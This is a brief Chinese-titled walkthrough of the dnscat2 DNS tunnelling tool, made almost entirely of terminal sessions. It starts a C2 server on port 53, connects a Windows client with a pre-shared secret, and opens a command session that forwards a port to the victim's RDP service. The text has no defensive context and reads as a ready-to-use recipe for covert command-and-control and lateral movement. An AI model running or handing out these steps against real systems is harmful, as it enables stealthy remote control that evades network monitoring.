dnscat2 代理隧道

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

# ruby dnscat2.rb
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=33971b1d1593d219ac8ed615d5339180

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2> 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

C:\> dnscat2.exe  --dns server=192.168.1.100,port=53 --secret=33971b1d1593d219ac8ed615d5339180
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 192.168.1.100

** Peer verified with pre-shared secret!

Session established!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2> windows
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains =  [*]
  1 :: command (LAPTOP) [encrypted and verified] [*]
dnscat2> 

1
2
3
4
5
6
7
8
9

(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (LAPTOP) 1> listen 1234 127.0.0.1:3389
Listening on 0.0.0.0:1234, sending connections to 127.0.0.1:3389
command (LAPTOP) 1>